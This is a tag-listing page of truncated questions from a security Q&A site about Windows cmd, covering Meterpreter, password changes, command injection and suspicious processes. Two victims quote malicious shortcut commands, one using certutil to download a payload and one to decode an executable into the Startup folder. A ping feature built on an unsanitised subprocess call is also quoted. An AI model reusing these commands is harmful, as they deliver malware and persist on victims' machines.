Questions tagged [cmd]

14 questions
18
votes
1 answer

Why does Windows not always force me to confirm my password when changing it?

If I can change my password with cmd net user example * without needing to confirm my old password, why, when I change my password in the usual way (via settings or control panel), do I need to confirm my old password? If the point of confirming a…
2
votes
1 answer

Cannot execute program with Meterpreter on target OS

I'm a uni student taking a course on cybersecurity and what I am attempting to do is solely for educational purposes and not malicious. I used the eternalblue exploit to gain access to the victim's computer (a Windows Server 2008 R2 virtual…
1
vote
0 answers

Unlocking a Windows computer through the CMD prompt

Let's say I had an "NT AUTHORITY\SYSTEM" command shell on my locked Windows computer (at the login prompt) and I would like to get log in as user X (as if I logged in normally with their username and password). User X is a Domain user and the…
puckblush
  • 11
  • 1
1
vote
0 answers

Is there such a thing as "parameterized terminal commands"?

Long ago, I used to do SQL queries like: SELECT * FROM table WHERE id = ' . attempt_to_escape($_GET['id']) . ' ORDER BY timestamp DESC LIMIT 1; This was horribly scary and I probably messed it up by using/not using quotes or not checking the…
1
vote
1 answer

Apple ID scam, gave control of my computer for a few minutes

I was called from what appears to be a legitimate apple phone number and I was told there was suspicious activity. Then I said I wanted to speak to someone and I was connected to a someone with an Indian accent. This person made me type…
0
votes
1 answer

Should a standard user in a AD domain be able to open cmd prompt as Administrator?

I was given a standard non-admin user and a workstation to perform internal pentest assessment. To my surprise, I was able to open cmd prompt as administrator, use psexec and gain a SYSTEM shell giving me local admin access. Is it normal to let…
sxmad
  • 115
  • 5
0
votes
0 answers

Security Risks Of Letting Users Send Pings On System

Through a chatbot I am developing, users will have the ability to ping servers. The command is .ping and this will be passed to python which will use subprocess.run(f'ping '). This will…
0
votes
0 answers

Random CMD opens up every 10 minutes

I've noticed that an unknown cmd opens up exactly every 10 minutes and disappears almost instantly. To try and figure out what's doing this i downloaded an application called focus.exe which prints out the pid and application that stole the focus.…
0
votes
1 answer

How dangerous are cmd scripts?

I accidentally clicked on a shortcut that is a script.. The shortcut was: %ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f…
0
votes
0 answers

Powershell (WinRM) and cmd.exe: reg query output deviation

during a CTF I encountered the following anomaly regarding PS & cmd.exe: I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell. Via the PS shell I…
0
votes
2 answers

why encryption result using 3 des is different between website and openssl commander?

I am working with OpenSSL using Windows 10 CMD. I am trying to encrypt something using triple des with key coded in base64 that stored in text file (assume that plain text is:"hi all I am someone", key.txt (key 24 byte coded in base64)), so I wrote…
Anas4795
  • 1
  • 1
0
votes
1 answer

Downloaded a file which turned out to be a shortcut that ran the following command, not sure what it did

I downloaded a torrent which turned out to be a shortcut that did the following thing. %ComSpec% /c certutil -decode "Succession.S02E07.720p.WEB.x265-MiNX.mkv.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe" >nul 2>&1…
anarchy
  • 103
  • 2
0
votes
2 answers

Cmd shuts down computer immediately after windows boots up and logs into the default account/user

as the title suggests, after I login to default/main account which has administration privileges, after desktop loads almost instantly CMD opens and shuts down the computer, only way I found to stop it temporary was to login to my other account…
-2
votes
2 answers

Difference between shell and meterpreter?

What exactly is the diffrence between meterpreter reverse_shell and any other non-meterpreter reverse shells? 1) The non-meterpreter reverse shell: windows/shell/reverse_tcp 2) Meterpreter: windows/meterpreter/reverse_tcp
ToXicL 16
  • 5
  • 1
  • 2